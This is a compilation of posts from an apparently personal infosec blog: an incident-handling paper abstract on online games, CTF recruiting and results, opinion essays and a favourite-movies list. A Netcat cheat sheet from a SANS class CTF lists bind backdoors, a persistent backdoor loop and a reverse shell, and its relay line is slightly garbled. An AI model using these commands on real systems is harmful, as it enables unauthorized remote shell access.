How to rescue orcs and spaceships

Hello, my name is Scott, and I'm a gamer. Sometimes it keeps me up way too late at night, but I care about my pretend space ships and the billions of Interstellar Kredits I've earned with them, and I'd be pissed if something happened to them.

A bit nerdy I realize, even for an information security blog, but it's true. There's no way to deny it, I do enjoy my online games. The fact is though I'm far from alone. Millions of people have been getting into one of the many massive multiplayer online games, from World of Warcraft to Second Life, from Lord of the Rings to EVE Online. Millions of people have invested incredible (some would probably say insane) numbers of hours to their wizards, pod pilots, hobbits, and a variety of other characters, constituting a huge investment of both time and money ($15 dollars a month adds up). This has become my motivation as I decided to get my GIAC Certified Incident Handler Gold certification as the focus of my practical.

I've been fascinated by the numerous security exploits in various online games. From EVE Online's database hack to Charlie Miller & Dino Dai Zovi's Second Life exploit it's interesting the unique factors that go into handling attacks in multiplayer online games. On one hand it's very much like a real economy, characters have assets, experience; money of some kind, and yet very much different (you can't exactly roll back a week of financial transactions in the real world).

As a result I've chosen to make my practical for getting my GCIH Gold certificate a study on Incident Handling in online games focused on case studies of actual handling by various game operations teams. Here's my abstract:

While generalized incident handling practices are essential to any system or network they do not always meet the needs of specialized systems. These systems have needs that go above and beyond the usual, and must be handled with unique attention to specific hosts, their functions, interactions, and overall system architecture. However in these specialized systems with similar functions there may be a way to generalize even the specialized requirements.

As massive multiplayer online gaming (MMORPG) continue to grow, through games like World of Warcraft, Second Life, and EVE Online, the amount of money being funneled into them grows as well. Where the money goes so do the criminals and as such online games are increasingly coming to light as targets for malicious attackers. Whether attacking for financial gain or to simply gain the upper hand in gameplay more and more vulnerabilities are being discovered and and exploited in online games.

MMORPGs are unique environments; worlds with their own economies and populations, players with their own experiences and assets, all of which are unique and important to the users who have invested hours upon hours into their virtual personas. This combination and complexity leads to creating vibrant and unique environments that make these games interesting to play, but also create a nightmare tradeoffs in the event that an incident handler must respond to in the event of a compromise.

This leads to a need for unique handling of incidents and thus a unique set of processes to be followed. This does not supersede the generalized handling guidelines, nor could it be completed comprehensive, but there can be a generalized incident handling guidelines for online games, a superset of generalized incident handling guidelines, such as those taught in the SANS 504 course.

To this end I would like to research and develop such a set of specialized handling guidelines, based on the proven general handling techniques from SANS, for consideration of incident handlers working on massive multiplayer online games. These will focus on the unique challenges and options available to handlers in online games, and will be based in large part from case studies of how such incidents have already been handled in current online games. Additionally it will include a survey of major online games, trying to gain as much insight as possible into how they currently structure their handling, in order to add as much real world experience into this effort as possible.

Even though it results in writing a paper and being uber-whitehat I'm kind of excited about writing this paper. Looking at attacking/defending online games is just beginning to get attention. That is somewhat surprising in itself since the online gaming industry is already doing billions in dollars yearly and continues growing. Nothing is quite as much fun as breaking new ground.

So now for you, my readers, I have a request: What are your thoughts and insights, on my abstract for my paper and on the topic in general. I'm very eager to hear what you have to say. Feel free to leave comments, send email (scott.roberts[at]vulnerableminds[dot]com), send a carrier pidgion, I'm interested to hear what you have to say.

Congratulations

Shmoocon IV was a good time for all. A few good talks, lots of good times meeting up with people, and for Alice, Mike, Sean, and Tim it was good old fashioned hacker fun as all of them played in Shmoocon's annual "Hack or Halo" competition. Now Mike was last years champion, and tied for first, but it was Tim who came in with the fastest time, and was this year's Hack or Halo winner.

Congratulations to Tim and everyone who participated.

CTF is coming & VM is recruiting

It may be a couple months away but Vulnerable Minds is getting read for one of the best parts of the year. No, not Christmas, Defcon. Say what you want about the Rivera, but Defcon is definitely one of the biggest events in the hacking community. Last year Vulnerable Minds competed for the first time in the Defcon qualifier, hoping to earn a spot to play CTF in Vegas.

Vulnerable Minds put in a good effort and did well for our first attempt. Out of 170 teams participating we ended up placing 30th, besting a number of very talented teams.

So now it's time to turn our thoughts towards this years competition. Vulnerable Minds is looking to build off last years strong showing and do even better this year. To that end we are looking for talented hackers interested in playing CTF, qualifying, and going to DefCon to play. Reversers, sploit coders, forensics gurus, even defensive specialists. DC area is preferred.

Not sure if this is your cup of tea? Check out information about qualification and CTF from the past two years from the L@stplace team (Winners the past two years at Defcon).

Interested? Fill out this handy contact form and we'll get in touch with you.

All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that only could last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario based ctf brought it all together as many of them were used during the game. Mostly we focused the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife" Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that, I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possible remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done

Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe

Traffic Replay:
nc [targetip] [port] < [filename]

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

Bad Reputation vs Bad Assumptions

I was wandering through my blog list today and, by way of the ever enjoyable Observations of a Digitally Enlightened Mind, came across an interesting but, in my opinion, totally unfounded and flawed article related to security.

The article in question is one where PopSci published a list of the 10 Worst Jobs in Science. Many of them are truly awful and I wouldn't wish on my worst enemy. Mind numbingly, stomach turningly bad. It was #6, nearly half way down a terrifying list, that the job in question was described.

Now I've been a Microsoft hater in my day, no question. As a security type person they've been quite the headache at various times, and as an Apple fan I don't really find it an enjoyable system to use. That being said if Microsoft were to track me down and ask if I was interested in a job working with their security teams I'd jump at it. 

Now the article is very correct about one aspect of it. Microsoft does wear a big "Hack Me" sign. It'd be nonstop pandemonium. Attacks at every angle, computer criminals gunning for you every day. If it's not the operating system it's the office suite, if it's not the office suite, it's the browser. There are few pieces of code attacked as aggressively as Microsoft's, it comes with the territory when you dominate the market place in so many genres the way they do. Microsoft should wear that "Hack Me" sign proudly, maybe with a big gold chain (that they can afford) and some bling letters.

So yes, under attack constantly. While I can't speak for anyone else that's exactly why I'd want to work for them, and I think that's perfectly natural. Surgeons may not like people being sick or hurt, but they sure enjoy cutting them open, or so I'm told (by my uncle who is one). It's the same with information security. A week (like the past couple) with few large threats gets dull quickly. Now the week when the ANI attacks came out, that was fun. Would working for Microsoft be easy? Not in the least but rarely do people learn when they're "safe". They don't grow without challenges.

If I wanted easy I'd go be a security guy for a small mom and pop somewhere, nice and safe, with a small number of supported apps, a smaller number of machines, and five users I could personally beat for being stupid. The Microsoft's, Amazon's, Mozilla's, government groups and financials are in the thick of it, defending dozens of complex pieces of software, hundreds of thousands of machines, and billions of dollars. The Internet is a very dangerous place for groups like those and I believe that's the most attractive reason to work for them.

And the answers please...

Over at Nopsr.us the Underminers (aka 1@stPlace, winners of last years Defcon CTF) have put up a follow up to last years CTF quals writeup, which you can find here.

@tlas and his gang do a fantastic job walking through each of the challenges, and a lot can be learned from just taking a look. Even better, they managed to pry the challenge source code out of Kenshoto's hands (a feat they managed to pull off before I did) and have it posted, so that nearly the entire scenario can be recreated for ownage pleasure in your very own home. So go give it a look, you'll learn a bunch.

For those who are curious, Vulnerable Minds did play this year and were quite pleased with our 30 out of 160 finish. In what is the largest Defcon qualification year ever we were stoaked to come the top fifth and had an awesome time. ev3, Narc, LogicX, Bacon, Gpmidi, Bacchus, and myself spent most of the weekend at Akolyte and Saijak's apt, chugging Red Bull, watching Jurassic Park on repeat (seriously Pwnage100 was crap), and hacking to our hearts content. It was a great weekend, the challenges were excellent, tough but enjoyable, and it was one of the most fun and interesting events I've been a part of.

So props to the Kenshoto guys for an fantastic quals round, to the NopsR.Us/Underminers/1@stplace guys for the fantastic writeups, and to the Minds who dedicated their weekend to playing a fantastic game.

And watch out next year because Vulnerable Minds is coming to break all of your plates!

Love of the game.

So! The qualifying round of DefCon's infamous Capture the Flag competition is this weekend. I'm excited, and not just because this would be my first CtF experience. The synergy (more or less) of people coming together with different experiences, knowledge, and ways of looking at problems could prove to be a great way to delve deeper into the field of code and code manipulation. (Let's be honest here, when it comes down to it, this is less about offense or defense and more about mental technique.)

This weekend, a group of us will be sharing one apartment, eating each other's food, hacking to the point of exhaustion... I can't think of a better way to spend a random summer weekend, but that could just be me. ;)

In preparation, I've been looking over last year's quals, helpfully posted by last year's team 1@stPlace. I think one of the things that blew me away was the wide range of topics presented, and the variety of exploitable things. XSS? Bitstream analysis? Reverse engineering protocols? Stealing entangled qbits? OK, just kidding about that last one, but it goes to show what an awesome, diverse field infosec can be. And as much as this is about hacking and having fun, I can only wonder what future DefCon CTFs may hold, especially with the dominance of mobile computing...

But the future can wait. This weekend, let teh funz beg!n.

Quick Note

Ivan Krstic is scary smart. That is all.

Before you mention it...

One of my least favorite things is when something from the infosec world makes the "real" news. There's stuff going on all the time that could drastically affect everyone who's ever even thought of being near a computer, but they're often ignored, and it's a mystery to see what becomes big news, and what's ignored.

Example:

Big issue That Was Largely Ignored: Net Neutrality

The Internet being segmented based solely on how much money you spend to be on the Internet. Spent millions per year to have multiple OC-3 connections directly to a backbone? You get priority. Spent $40 per month (which is still way too expensive Comcast) to get a mid range home cable connection? You're a second tier citizen who's needs an wants come second.
Results: Companies like Microsoft, Comcast, Verizon, and others paying to control the Internet to make even more money than they do now. For people like you and me YouTube becomes impossible to use, those with the desire to can run even fewer home servers than now, and the general expectations you have of how the Internet should act go out the window.

Minor Issue That Is Getting Huge Attention: The "Cyber Jihad" Against the United States Banking System

One small extremist website has announced they're going to attack the US financial infrastructure during the month of December. Hmmm, terrifying. Guess what, attacks happen all the time. Theres already attacks coming from every edge of the globe all the time. Crime goes where the money goes. Banks have money. Put two and two together. Figured it out?
Guess what, the banks have too, most of them back in the 1990's, and vast majority of them are well prepared. While I have no evidence to support this I feel pretty safe saying that the financial world is second only to the military in being ready to deal with cyber threats. In some cases the military could probably even learn a thing or two. I'm not really concerned that I'm going to wake up in the morning and find my bank compromised by Muslim extremists any more than I'm worried about the Falun Gong, the Tamil Tigers, or some random kid in a basement in Idaho.

Now I don't blame the people around me who get worked up about this sort of thing. I blame the media, their biases and their ignorance, for which stories get big play and make the 6 o'clock news, and which ones never get mentioned off the infosec specific news sites. That's not my friends and families fault. What I am tired of is when everyone from my friends and family to random people I meet on the street want to tell me about whatever issue makes it into the media as though I've never heard of it before, insinuating that I personally, and the security industry in general, aren't prepared for it, and in such a way that they've done me a favor by informing me of it.

Now asking me about something like the Cyber Jihad, knowing the field I'm in, is fine and I'd be happy to give my opinion if asked for it (I'm sure you're muttering something about my willingness to provide opinions right now). I actually enjoy that. That being said, don't insult me though by expecting I have no idea about something that you caught on CNN and acting like you're helping me out. Security people, be it information security, physical security, homeland security, or any other security, are news junkies of the highest caliber. Security thrives on being aware of the changing threat landscape, so it's safe to assume that not only is any security person you know very in tune with main stream media, but is also tapped into many industry specific news sources, and was probably intimately aware and already moved on past any event before it even makes it to some mainstream media editors desk.

So thanks for the tip, whatever it was, but I was already aware. Save the energy and give Security Focus or the Internet Storm Center a look. You might learn something.

Out of curiosity: Am I the only one who deals with this and feels this way?

Gauntlet Thrown...

So driving home from a meeting of the DC Linux Users Group to hear a gentleman from Amazon discuss they're many Amazon Web Services offerings, of which I'm already using S3 and curious about some of the others, my friends and I began discussing movies. Like much of the nation I went and saw Borat: LoAftmbtGnoK (yeah, LotR seems much easier to say huh?), found it humorous, and recommended it to my friend al3x.

Lets clear one thing up: Borat was a movie that was great because it was so bad. Sasha Cohen is brilliant in knowing how inane, how crude, how sarcastic he can be, pushing the envelope of funny, bordering on obnoxious the whole time, and at least to most, not crossing over. It's a fine line, and I can understand why some would find it less than enjoyable, but to most I think it was amusing.

al3x was not so amused, which shouldn't have surprised me much, but I was surprised when this lead to a general questioning of my taste in movies in general. The group then proceeded to debate the merits of the.... "classic"(?!?) Debbie Does Dallas, while continuing to question my taste. Obviously an ironic situation. Brittany, still questioning my taste (while debating whether Debbie did all of Dallas or simply it's most questionable areas) suggested I attempt to justify my tasted by detailing my Top 5 favorite movies from the past few years. As I said in my title, a gauntlet thrown down, and now a gauntlet picked up. Prepare to dual:

• V for Vendetta: What's not to love? A sort of twisted, retro futuristic 1984 style government commentary with much of the fun of the Matrix but with decent acting, a well thought out even if kind of hit over the head plot, and something to be taken away from it. My goodness, it's like cinema is attempting to challenge it's audience a bit. The greatest bit of cinematography ever? No. Engaging, topical, and enjoyable? Indeed.
• The Road to Perdition: Perhaps the best peace of pure cinema to go mainstream in the past 5 years this movie had a combination story, dialogue, cast, soundtrack, and cinematography that I can scarcely think of an equal to. The story was incredibly compelling in the twisted "wanting the bad guy to win" sort of way that Hollywood often tries, but usually fails to do successfully. Not to mention it's been one of the few movies to realize that sometimes it's more powerful when there's less dialogue then more. The camera work was also out of this world.
• The Boondock Saints: I'm gonna get ripped up on this one but I can't say I care for a second. Say what you want. I don't know of a small release movie that a wider range of people have enjoyed as much and as often as Boondock Saints. It can't even be called a cult following, there's way too wide a range of people. It's witty, it's silly, it's serious, great sound track, better acting than the film deserved, and it asks a moral question that's easy to overlook considering fun movies like that rarely ask tough questions. Not to mention it contains easily the most hardcore prayer in history.
• Inside Man: Every guy loves a good heist movie. All of them. There isn't a guy on earth who doesn't love the righteous (or at least semi righteous) band of thieves who steals an incredible amount of jewels, money, paintings, or cars through an elaborate scheme that makes you question whether the writers are really on the up and up. There aren't too many girls who don't enjoy them also. Gone in 60 Seconds was good, Oceans 11 was better (but 12 was a joke), and I've heard great things about Heat, but Inside Man tops the genre. Again, superb acting, the most brilliant setup that was both elaborate but plausible, and a bad guy you're not only glad gets robbed, but deserves it. Clive Owen is also the man, good guy, bad guy, can't beat him.
  
• Garden State: Before you thought it'd be nothing but action movies here ya go. Kudos to Zach Braff who wrote, directed, and starred (all at 29 years of age) in this, well, not quite coming of age but something like it tale. Anyone who's ever been away from their hometown, only to come home and find it startlingly different and yet frighteningly the same care relate and enjoy this movie. Not only an outlet for Braffs talent, it also let Natalie Portman use up all that acting ability she apparently didn't want to waste on StarWars I, II, and III.

There you go. Challenge answered. I submit these movies as some of the best of the past few years. Movies nearly everyone can enjoy, that offer more than a thin veneer of enjoyment, but really provide something long lasting. Any one of these movies you could watch once every six months and never get tired of. Give them a look if you haven't already and enjoy.

And while I don't want to jump to conclusions, or jinx it in anyway, I expect I'll have a new movie that I'd add to that list by the end of the day.